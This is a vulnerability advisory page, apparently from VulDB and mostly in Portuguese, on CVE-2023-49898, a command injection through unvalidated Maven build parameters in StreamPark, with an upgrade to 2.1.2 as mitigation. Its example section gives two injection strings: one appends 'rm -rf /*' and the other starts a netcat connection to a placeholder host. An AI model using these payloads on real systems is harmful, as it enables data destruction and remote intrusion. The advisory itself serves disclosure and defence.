CVE-2023-49898 in StreamParkinformação

Sumário

de VulDB • 27/06/2026

No streampark, há um módulo de projeto que integra a capacidade de compilação do Maven. No entanto, não há verificação dos parâmetros de compilação do Maven, permitindo que invasores insiram comandos para execução remota de comandos (RCE). O pré-requisito para um ataque bem-sucedido é que o usuário precise fazer login no sistema streampark e ter permissões em nível de sistema. Geralmente, apenas usuários desse sistema têm autorização para fazer login, e os usuários não inseririam manualmente um comando de operação perigosa. Portanto, o nível de risco desta vulnerabilidade é muito baixo.

Mitigação:

Todos os usuários devem atualizar para a versão 2.1.2.

Exemplo:

## Você pode personalizar o método de concatenação conforme a situação de compilação do projeto; use && para resultados bem-sucedidos da compilação mvn e || ou && em caso de falha na compilação:

/usr/share/java/maven-3/conf/settings.xml || rm -rf /*

/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Reservar

01/12/2023

Divulgação

15/12/2023

Moderação

aceite

Entrada

VDB-248174

CPE

pronto

Exploração

Descarregar

EPSS

0.02299

KEV

não

Atividades

muito baixo

Fontes

Do you know our Splunk app?

Download it now for free!